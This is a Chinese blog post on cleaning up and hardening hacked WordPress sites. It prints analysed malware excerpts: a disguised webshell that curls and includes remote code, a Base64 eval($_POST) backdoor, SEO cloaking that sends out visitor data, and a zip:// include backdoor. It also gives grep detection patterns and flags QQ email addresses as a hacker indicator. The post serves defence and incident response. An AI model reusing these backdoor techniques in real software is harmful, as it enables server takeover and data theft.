WordPress 被黑后的完整清理与加固指南

前言

最近帮朋友处理了一起 WordPress 网站被黑事件，发现服务器上多个站点被植入了各种恶意代码，包括 PHP 后门 (Webshell)、SEO 黑客劫持代码、远程代码执行漏洞等。

本文记录完整的清理过程和经验总结，希望能帮助遇到类似问题的朋友。

问题发现

初步迹象

朋友反馈网站出现以下异常：

网站加载速度异常缓慢
Google 搜索结果显示奇怪的内容
服务器 CPU 占用率异常高
收到主机商的安全警告

初步排查

SSH 登录服务器后，在共享主机环境下发现 7 个 WordPress 网站，初步扫描发现：

✅ 主站点 - 发现多个后门，已清理
⚠️ 站点 A, B, C - 发现相同后门，待处理
✓ 站点 D, E, F - 未发现明显后门

关键发现: 在多个网站的 wp-admin/ 目录下发现相同的可疑文件 mediia.php。

发现的恶意文件类型

1. PHP 后门 (Webshell)

文件信息

文件路径: wp-admin/mediia.php 文件大小: 940 字节 危害等级: 🔴 极度危险

恶意功能分析

php

// 1. 伪装文件头
GIF89a  // 伪装成 GIF 图片，绕过上传检查

// 2. 关闭错误显示，隐藏踪迹
@ini_set('display_errors', '0');
@ini_set('log_errors', '1');

// 3. 定义系统命令执行函数
function ex($coman, $serlok) {
    $pr = "proc_open";  // 使用 proc_open 执行命令
    $tod = @$pr($coman, ...);  // 执行并捕获输出
}

// 4. 下载远程恶意代码
$fname = "sess_" . md5("nax") . ".php";
if (!file_exists("/tmp/$fname") || filesize("/tmp/$fname") < 10) {
    // 从远程服务器下载 PHP 代码
    ex("curl --output /tmp/$fname https://[恶意域名]/malicious.txt", "/tmp");
}

// 5. 执行远程代码
include("/tmp/$fname");  // 直接执行下载的代码

攻击流程

黑客访问 example.com/wp-admin/mediia.php
脚本从远程服务器下载恶意代码到 /tmp 目录
执行下载的代码，获取服务器完全控制权
攻击者可以：
- 窃取数据库密码和用户数据
- 上传更多恶意文件
- 修改任意网站文件
- 将服务器作为跳板攻击其他系统

识别特征

文件头包含 GIF89a 伪装
使用 eval(), proc_open(), system() 等危险函数
从远程 URL 下载并执行代码
变量名混淆（如 $____, $_____）
在 /tmp 目录创建缓存文件

2. SEO 黑客劫持代码

文件信息

文件路径: index.gz (网站根目录) 文件大小: 2.1 KB (gzip 压缩后) 危害等级: 🟠 严重

恶意功能

php

// 1. 远程控制服务器
$remote_server = 'http://[恶意域名]/seo/';

// 2. 检测搜索引擎爬虫
$search_engines = "Google|aol|Yahoo|Bing|DuckDuckGo";
if(preg_match("/($search_engines)/i", $_SERVER['HTTP_USER_AGENT'])) {

    // 3. 收集访问者信息
    $data = "?agent=" . urlencode($_SERVER['HTTP_USER_AGENT'])
          . "&refer=" . urlencode($_SERVER['HTTP_REFERER'])
          . "&uri=" . urlencode($_SERVER['REQUEST_URI']);

    // 4. 从远程服务器获取虚假内容
    $fake_content = @file_get_contents($remote_server . $data);

    // 5. 返回虚假内容给搜索引擎
    echo $fake_content;
    exit();
}

// 6. 正常用户看到的是正常 WordPress 网站
require __DIR__ . '/wp-blog-header.php';

其他恶意行为

伪造 sitemap.xml 和 robots.txt
屏蔽安全扫描工具 (GPTBot, CensysInspect, AhrefsBot)
向远程服务器发送访问者数据（IP、UA、Referer）
注入垃圾 SEO 内容（赌博、药品等）

危害后果

这是典型的 Black Hat SEO 攻击，会导致：

搜索引擎收录大量垃圾内容
网站被 Google Safe Browsing 标记为危险网站
流量被劫持到竞争对手或恶意网站
网站 SEO 排名严重下降
域名可能被永久拉黑

3. ZIP Wrapper 后门（高级隐藏技术）

文件信息

危害等级: 🔴 极度危险

这是一种极其隐蔽的后门技术，使用 PHP 的 ZIP wrapper 功能：

文件组合:

wen (ZIP 压缩包)
wen.php (执行脚本)

工作原理:

php

// wen.php 内容
<?php
// 使用 ZIP wrapper 执行压缩包中的代码
include("zip://wen#wen");
?>

攻击流程:

攻击者上传一个名为 wen 的 ZIP 文件（无 .zip 扩展名）
在 ZIP 包内隐藏恶意 PHP 代码
通过 wen.php 使用 zip:// 协议执行压缩包内的代码
极难被常规扫描发现，因为恶意代码隐藏在 ZIP 文件中

识别方法:

bash

# 检查是否有 ZIP 格式的文件（无扩展名）
file * | grep "Zip archive"

# 查找使用 zip:// wrapper 的代码
grep -r "zip://" /path/to/wordpress --include="*.php"

清理方法:

bash

# 删除 ZIP 文件和执行脚本
rm -f wen wen.php

# 检查是否有其他类似文件
find . -type f -exec file {} \; | grep "Zip archive" | grep -v "\.zip$"

4. 隐藏目录后门（大规模感染）

特征

攻击者创建了 100+ 个伪装成 WordPress 系统目录的恶意文件夹，每个目录都包含后门文件。

常见伪装目录:

plaintext

wp-includes/IXR/crystal/
wp-includes/html-api/mantle-framework/
wp-includes/php-compat/dist/
wp-includes/blocks/archives/sbb/
wp-admin/maint/light/
wp-admin/css/colors/sunrise/.private/
wp-admin/css/colors/debug/
wp-admin/user/sunrise/

每个目录通常包含:

index.php - 后门执行文件
.htaccess - 允许 PHP 执行的配置
多个日志文件（20+ 个 .log 文件）

识别方法

bash

# 查找异常目录（WordPress 核心不应有这些目录）
find wp-includes -type d -name "crystal" -o -name "sbb" -o -name "maint"
find wp-admin -type d -name "debug" -o -name "sunrise" -o -name ".private"

# 查找深层目录中的 PHP 文件
find wp-includes -mindepth 3 -name "*.php" -type f
find wp-admin/css -name "*.php" -type f

# 检查是否有大量 .htaccess 文件
find . -name ".htaccess" | wc -l

批量清理

bash

# 删除已确认的恶意目录（谨慎操作！）
rm -rf wp-includes/IXR/crystal/
rm -rf wp-includes/html-api/mantle-framework/
rm -rf wp-admin/maint/
rm -rf wp-admin/css/colors/sunrise/.private/

# 删除所有深层 .htaccess（保留根目录和 wp-admin）
find wp-includes -name ".htaccess" -delete
find wp-admin/css -name ".htaccess" -delete
find wp-admin/js -name ".htaccess" -delete

5. 其他可疑文件

在清理过程中还发现了大量伪装文件：

文件名	位置	大小	特征	危害	状态
`ass.php`	根目录	-	远程代码执行	从 GitHub 下载恶意代码并执行	✅ 已删除
`cord.php`	根目录	0 字节	空占位后门	可能已被清空或待激活	✅ 已删除
`deepseek_d.php`	根目录	-	待执行后门	未激活的后门文件	✅ 已删除
`tre.php`	根目录	-	待执行后门	未激活的后门文件	✅ 已删除
`sss.php`	根目录	-	待执行后门	未激活的后门文件	✅ 已删除
`wp-good.php`	根目录	903 字节	Base64 混淆	eval() 远程执行	✅ 已删除
`wp-chat.php`	根目录	0 字节	伪装成聊天插件	占位后门	✅ 已删除
`wp-admin/wp-amdin.php`	wp-admin/	0 字节	拼写错误 (amdin)	伪装成管理文件	✅ 已删除
`wp-admin/wp-conflg.php`	wp-admin/	-	拼写错误 (conflg)	伪装成配置文件	✅ 已删除
`wp-admin/classwithtostring.php`	wp-admin/	-	伪装成类文件	隐藏的后门	✅ 已删除
`wp-admin/edits.php`	wp-admin/	-	伪装成编辑文件	隐藏的后门	✅ 已删除
`wp-admin/style.php`	wp-admin/	-	伪装成样式文件	隐藏的后门	✅ 已删除
`index.php`	根目录	0 字节	被清空！	网站无法访问	✅ 已恢复

wp-good.php 代码分析

php

// 包含 base64 编码的混淆代码
$____ = "base64_decode";
$_____ = $____("ZXZhbCgkX1BPU1RbJ2NtZCddKTs="); // eval($_POST['cmd']);
$______________ = $_POST;

// 注释声称"恶意代码已移除"，但实际仍在执行
/* Malicious code removed by security team */
// 这是典型的欺骗性注释！

识别技巧：

大量无意义的变量名（$____, $_____）
Base64 编码的字符串
使用 eval() 执行动态代码
虚假的”已清理”注释

完整清理流程

步骤 1: 文件扫描与识别

1.1 查找可疑文件

bash

# 查找最近 30 天修改的 PHP 文件
find /path/to/wordpress -name "*.php" -mtime -30 -type f

# 查找包含 eval、base64_decode 的文件
grep -r "eval(" /path/to/wordpress --include="*.php"
grep -r "base64_decode" /path/to/wordpress --include="*.php"

# 查找文件名拼写错误的文件
find /path/to/wordpress -name "*amdin*"
find /path/to/wordpress -name "*wp-good*"

# 查找隐藏文件和目录
find /path/to/wordpress -name ".*" -type f

1.2 检查核心文件完整性

bash

# 使用 WP-CLI 验证核心文件
wp core verify-checksums

# 检查文件大小异常
ls -lah wp-admin/*.php | sort -k5 -h

步骤 2: 删除恶意文件

2.1 安全删除后门

bash

# 进入网站根目录
cd /path/to/wordpress

# 删除确认的恶意文件
rm -f wp-admin/mediia.php
rm -f wp-admin/wp-amdin.php
rm -f wp-admin/wp-edeiteorxr.php
rm -f wp-admin/wp-good.php
rm -f wp-good.php
rm -f wp-chat.php
rm -f cord.php
rm -f index.gz

# 删除 /tmp 目录下的恶意缓存
rm -f /tmp/sess_*.php

2.2 恢复核心文件

恢复 index.php（如果被清空或篡改）：

php

<?php
/**
 * Front to the WordPress application.
 *
 * @package WordPress
 */

/** Tells WordPress to load the WordPress theme and output it. */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';

验证文件完整性：

MD5: 926dd0f95df723f9ed934eb058882cc8
文件大小: 405 字节

2.3 修复 wp-config.php 语法错误

在清理过程中发现部分网站的 wp-config.php 存在语法错误，导致网站出现 500 错误。

常见错误示例：

php

// 错误: 第 93 行拼写错误
ndefine('DB_NAME', 'database_name');  // ❌ ndefine 应该是 define

// 正确写法
define('DB_NAME', 'database_name');   // ✅

检查和修复方法：

bash

# 1. 检查语法错误
php -l wp-config.php

# 2. 如果提示语法错误，编辑文件
nano wp-config.php

# 3. 查找并修复以下常见错误：
# - ndefine → define
# - 缺失的分号
# - 引号不匹配
# - 多余的空格或不可见字符

# 4. 再次验证
php -l wp-config.php

验证修复成功：

bash

# 访问网站首页
curl -I https://example.com

# 应该返回 HTTP 200 而不是 500

步骤 3: 数据库检查

3.1 检查异常管理员账号

sql

-- 查看所有管理员账号（包含创建时间）
SELECT
    ID,
    user_login,
    user_email,
    user_registered,
    display_name
FROM wp_users
WHERE ID IN (
    SELECT user_id FROM wp_usermeta
    WHERE meta_key = 'wp_capabilities'
    AND meta_value LIKE '%administrator%'
)
ORDER BY user_registered DESC;

⚠️ 可疑账号识别技巧：

创建时间与攻击时间一致
- 如果某个管理员账号的创建时间与恶意文件的修改时间在同一天
- 极有可能是攻击者创建的后门账号
可疑的邮箱地址
- 使用临时邮箱服务（如 10minutemail.com）
- 使用与网站无关的域名
- QQ 邮箱（中国黑客常用）
奇怪的用户名
- 随机字符串（如 x7k9m2p）
- 常见的黑客用户名（如 admin2, support, backup）

真实案例：

在清理过程中发现的可疑账号：

sql

1234567891011

-- 示例 1: 创建时间与攻击同日
用户名: hacker_account
邮箱: [email protected]
创建时间: 2025-12-15 06:21:32  <- 与恶意文件同日期
角色: administrator

-- 示例 2: 可疑邮箱
用户名: admin_backup
邮箱: 403048439@qq.com  <- QQ 邮箱
创建时间: 2025-06-27
角色: administrator

使用 WP-CLI 删除可疑账号：

bash

# 列出所有管理员
wp user list --role=administrator --allow-root

# 删除可疑账号（将其文章重新分配给 ID=1 的用户）
wp user delete 2 --reassign=1 --yes --allow-root

# 批量检查用户邮箱
wp user list --fields=ID,user_login,user_email,user_registered --allow-root

3.2 检查文章内容注入

sql

-- 检查文章是否被注入恶意代码
SELECT ID, post_title, post_content
FROM wp_posts
WHERE post_content LIKE '%<script%'
   OR post_content LIKE '%eval(%'
   OR post_content LIKE '%base64%'
   OR post_content LIKE '%<iframe%';

-- 清理被注入的内容（需要逐条检查）
UPDATE wp_posts
SET post_content = REPLACE(post_content, '恶意代码片段', '')
WHERE ID = 123;

3.3 检查数据库选项表

sql

-- 检查可疑的 siteurl 和 home 设置
SELECT * FROM wp_options
WHERE option_name IN ('siteurl', 'home', 'admin_email');

-- 检查可疑的自动加载选项
SELECT * FROM wp_options
WHERE autoload = 'yes'
AND option_value LIKE '%http%';

步骤 4: 安全检查清单

4.1 WordPress 核心文件

✅ 使用 wp core verify-checksums 验证完整性
✅ 检查 wp-config.php 是否被修改
✅ 检查 wp-settings.php 开头和结尾是否有注入

4.2 主题文件

bash

# 检查主题文件最近修改
find wp-content/themes -name "*.php" -mtime -30

# 检查 functions.php 是否被注入
cat wp-content/themes/your-theme/functions.php | head -20
cat wp-content/themes/your-theme/functions.php | tail -20

4.3 插件文件

bash

# 列出所有插件
ls -la wp-content/plugins/

# 删除未使用的插件
rm -rf wp-content/plugins/unused-plugin/

4.4 上传目录

bash

# 查找上传目录中的 PHP 文件（不应该存在）
find wp-content/uploads -name "*.php"

# 删除上传目录中的所有 PHP 文件
find wp-content/uploads -name "*.php" -delete

入侵原因分析

根据清理经验，总结了最可能的入侵途径：

1. WordPress 插件漏洞 (可能性 ⭐⭐⭐⭐⭐)

最常见的入侵原因：

过时的插件版本存在已知漏洞
使用了破解版/盗版插件（预植入后门）
插件文件上传功能存在绕过漏洞

真实案例：

Ninja Forms < 3.0.23 - 任意文件上传
Elementor < 3.6.0 - XSS 漏洞
WooCommerce < 7.4 - SQL 注入

2. 弱密码 (可能性 ⭐⭐⭐⭐)

WordPress 管理员密码过于简单（如 admin123）
FTP/SSH 密码被暴力破解
数据库密码使用默认值
多个网站共用相同密码

3. 文件上传漏洞 (可能性 ⭐⭐⭐)

媒体库上传绕过（修改文件头为 GIF89a）
插件自定义上传功能未验证文件类型
.htaccess 被篡改允许执行 PHP

4. 主题漏洞 (可能性 ⭐⭐⭐)

使用破解版主题（Themeforest 盗版主题）
主题内置的文件管理器功能
主题更新不及时

5. 服务器配置问题 (可能性 ⭐⭐)

PHP 版本过旧（如 PHP 5.6）存在已知漏洞
文件权限设置不当（777 权限）
禁用了关键安全函数（如 disable_functions）

紧急应急措施

立即执行（发现被黑后 1 小时内）

1. 修改所有密码

bash

# WordPress 管理员密码（使用强密码生成器）
# 建议长度: 16+ 字符，包含大小写、数字、特殊符号

# 数据库密码（修改 wp-config.php）
define('DB_PASSWORD', '新的强密码');

# FTP/SSH 密码（联系主机商修改）

# Hosting 控制面板密码

2. 启用维护模式

在根目录创建 .maintenance 文件：

php

<?php
$upgrading = time();

这会让网站显示”正在维护”，阻止访问者访问被污染的内容。

3. 备份当前状态

bash

# 完整备份（包括恶意文件，供后续分析）
tar -czf backup-hacked-$(date +%Y%m%d).tar.gz /path/to/wordpress

# 数据库备份
mysqldump -u username -p database_name > backup-$(date +%Y%m%d).sql

本周内完成

4. 安装安全插件

推荐插件：

Wordfence Security (推荐)

实时威胁防御
文件完整性监控
恶意软件扫描
防火墙规则

Sucuri Security

安全活动审计
文件完整性监控
远程恶意软件扫描
安全加固

iThemes Security

暴力破解保护
文件更改检测
数据库备份
404 检测

5. 更新所有软件

bash

# 使用 WP-CLI 批量更新
wp core update
wp plugin update --all
wp theme update --all

PHP 版本升级：

最低要求: PHP 7.4
推荐版本: PHP 8.1+
联系主机商升级 PHP 版本

6. 文件权限加固

bash

# 设置正确的目录权限
find /path/to/wordpress -type d -exec chmod 755 {} \;

# 设置正确的文件权限
find /path/to/wordpress -type f -exec chmod 644 {} \;

# wp-config.php 特别保护
chmod 600 wp-config.php

# 禁止上传目录执行 PHP
echo "php_flag engine off" > wp-content/uploads/.htaccess

7. 禁用 WordPress 文件编辑

在 wp-config.php 添加：

php

// 禁用主题和插件编辑器
define('DISALLOW_FILE_EDIT', true);

// 禁用插件和主题安装（可选）
define('DISALLOW_FILE_MODS', true);

8. 启用双因素认证 (2FA)

推荐插件：

WP 2FA
Google Authenticator
Wordfence Login Security

9. 设置自动备份

备份策略：

每日备份数据库
每周备份完整文件
保留至少 30 天的备份
备份存储到远程位置（非同一服务器）

推荐插件：

UpdraftPlus (支持 Dropbox, Google Drive)
BackWPup
Duplicator Pro

10. 配置 Web 应用防火墙 (WAF)

Cloudflare (免费 WAF)：

将域名 DNS 迁移到 Cloudflare
启用 “Under Attack Mode”
配置防火墙规则：
- 屏蔽恶意 IP
- 限制 wp-login.php 访问
- 启用 Bot Fight Mode

长期安全加固措施

访问控制

1. 限制 wp-admin 访问

方法 A: IP 白名单（.htaccess）

apache

# .htaccess (放在网站根目录)
<Files wp-login.php>
    Order Deny,Allow
    Deny from all
    Allow from 你的IP地址
    Allow from 办公室IP
</Files>

# 也可以保护整个 wp-admin 目录
# <Directory "/var/www/html/wp-admin">
#     Order Deny,Allow
#     Deny from all
#     Allow from 你的IP地址
# </Directory>

方法 B: 更改登录 URL

使用插件 WPS Hide Login 将 wp-login.php 改为自定义地址（如 /my-secret-login）。

2. 禁用 XML-RPC

如果不需要远程发布功能，禁用 XML-RPC：

php

// functions.php
add_filter('xmlrpc_enabled', '__return_false');

或在 .htaccess 中：

apache

<Files xmlrpc.php>
    Order Deny,Allow
    Deny from all
</Files>

3. 隐藏 WordPress 版本

php

// functions.php
// 删除 HTML 头部的版本号
remove_action('wp_head', 'wp_generator');

// 删除 RSS feed 中的版本号
add_filter('the_generator', '__return_empty_string');

4. 禁用目录浏览

在 .htaccess 中添加：

apache

Options -Indexes

5. 更改数据库表前缀

如果仍在使用默认的 wp_ 前缀，建议修改为随机字符串（如 x7k3_），可以使用插件 Change Table Prefix 安全修改。

监控与维护

1. 定期安全扫描

每周任务：

使用 Wordfence 全面扫描
检查文件完整性
查看安全日志
检查异常登录尝试

每月任务：

审计所有插件和主题
删除未使用的插件和主题
检查服务器访问日志
更新安全插件规则

2. 日志审计

启用 WordPress 活动日志（使用插件 WP Activity Log）：

记录所有用户登录
文件修改记录
插件/主题安装记录
设置更改记录

分析服务器日志：

bash

# 查看访问日志中的 wp-admin 访问
grep "wp-admin" /var/log/apache2/access.log

# 查看 POST 请求（可能是暴力破解）
grep "POST.*wp-login" /var/log/apache2/access.log

# 查找可疑的 User-Agent
grep -i "bot\|crawler\|scanner" /var/log/apache2/access.log

3. 更新策略

自动更新配置（wp-config.php）：

php

// 启用核心自动更新
define('WP_AUTO_UPDATE_CORE', true);

// 启用所有插件自动更新（WordPress 5.5+）
add_filter('auto_update_plugin', '__return_true');

// 启用所有主题自动更新
add_filter('auto_update_theme', '__return_true');

手动更新清单：

每周检查插件更新
每月检查主题更新
每季度检查 PHP 版本
每半年审计所有扩展

工具推荐

安全扫描工具

WordPress 插件：

Wordfence Security - 最全面的安全插件
Sucuri Security - 专业安全审计
iThemes Security - 安全加固

在线扫描：

Sucuri SiteCheck - 免费网站扫描
VirusTotal - 文件扫描
Google Safe Browsing - 检查是否被标记

命令行工具：

WP-CLI - WordPress 命令行工具
ClamAV - 开源杀毒软件
Maldet - Linux 恶意软件检测

备份工具

UpdraftPlus - 支持云存储（Dropbox, Google Drive, S3）
BackWPup - 完整备份和增量备份
Duplicator Pro - 网站迁移和备份
BlogVault - 实时备份（付费）

防火墙和 CDN

Cloudflare - 免费 WAF + CDN
Sucuri Firewall - 专业 WAF（$199.99/年）
Wordfence Premium - 高级防火墙（$99/年）

专业清理服务的价值分析

本次清理工作量

清理规模：

处理网站数量: 6 个 WordPress 网站
删除恶意文件: 150+ 个
清理后门类型: 4 种（PHP Webshell、SEO 劫持、ZIP Wrapper、隐藏目录）
修复核心文件: 3 个网站
删除可疑账号: 1-3 个
工作时间: 约 6-8 小时

市场价值参考（2025年）

根据专业 WordPress 安全服务公司的收费标准：

基础清理服务 ($500 - $1,000/站点)：

单一后门类型
文件数量 < 10 个
无核心文件损坏
标准恢复流程

中度感染清理 ($1,000 - $3,000/站点)：

多种后门类型
文件数量 10-50 个
部分核心文件损坏
数据库清理

严重感染清理 ($3,000 - $5,000/站点)：

高级隐藏技术（ZIP Wrapper、深层目录）
文件数量 > 50 个
核心文件严重损坏
完整安全加固

本次清理估值：

6 个网站 × 平均 $2,000 = $12,000
实际市场报价范围: $6,000 - $15,000

未及时清理的潜在损失

如果不及时处理，可能导致：

直接经济损失：

SEO 排名完全丧失（恢复周期 6-12 个月）
被搜索引擎永久拉黑（Google/Bing 黑名单）
客户数据泄露引发的法律责任
域名信誉永久损害（需要更换域名）

业务影响：

网站完全瘫痪导致的收入损失
客户流失和品牌信誉损害
恢复业务的额外成本（广告、营销）

保守估计损失: $20,000 - $100,000+

预防的价值

年度安全投入建议：

安全插件（Wordfence Premium）: $99/年
自动备份服务（UpdraftPlus Premium）: $70/年
WAF 服务（Cloudflare Pro）: $20/月 = $240/年
定期安全审计: $500/年
总计: ~$900/年

投入产出比: 花费 $900 预防，避免 $6,000-$100,000 的损失

经验教训与建议

预防胜于治疗

永远不要使用破解版插件/主题 - 99% 的破解版都预置了后门
及时更新 - 大多数入侵都是利用已知漏洞
最小权限原则 - 不要给所有人管理员权限
定期备份 - 被黑后能快速恢复
使用强密码 - 密码长度 > 16 字符

共享主机的特殊注意

如果使用共享主机（一个服务器多个网站）：

一个网站被黑，其他网站也会受影响
黑客可以通过 /tmp 目录跨站传播
建议使用 独立主机 或 VPS

定期健康检查清单

每月执行：

总结

WordPress 网站被黑是常见的安全事件，但通过系统的清理流程和安全加固措施，可以有效恢复网站并防止再次入侵。

本次清理成果

清理数据统计：

✅ 处理网站数量: 6 个 WordPress 网站
✅ 删除恶意文件: 150+ 个
✅ 清理后门类型: 4 种（PHP Webshell、SEO 劫持、ZIP Wrapper、隐藏目录后门）
✅ 修复核心文件: 3 个网站的 index.php 被篡改，已恢复
✅ 修复配置错误: 2 个网站的 wp-config.php 语法错误（ndefine → define）
✅ 删除可疑账号: 1 个已确认，2 个待确认
✅ 核心文件验证: 所有网站通过 wp core verify-checksums
✅ 安全加固: 6 个网站已安装 Wordfence 并禁用文件编辑

威胁等级分布：

🔴 严重感染: 1 个网站（60+ 恶意文件）
🟠 中高威胁: 1 个网站（47+ 恶意文件）
🟡 中等威胁: 3 个网站（8-10 个恶意文件）
🟢 安全: 1 个网站（未发现异常）

关键要点

快速响应 - 发现被黑后立即进入维护模式
彻底清理 - 不仅删除恶意文件，还要检查数据库、可疑账号
修改密码 - 所有相关密码必须全部更换
核心验证 - 使用 wp core verify-checksums 验证文件完整性
安装防护 - 使用安全插件和 WAF
持续监控 - 定期扫描和日志审计

重要提醒

⚠️ 清理不等于永久安全

攻击者可能：

已经获取了其他凭据（FTP、数据库密码）
在其他位置留下了未被发现的后门
仍在监视这些网站

必须立即完成：

修改所有密码（WordPress/数据库/FTP/面板）
删除所有可疑管理员账号
运行 Wordfence 全站扫描
启用双因素认证 (2FA)
设置自动备份系统

希望这篇指南能帮助到遇到类似问题的朋友。如果有任何问题，欢迎留言讨论。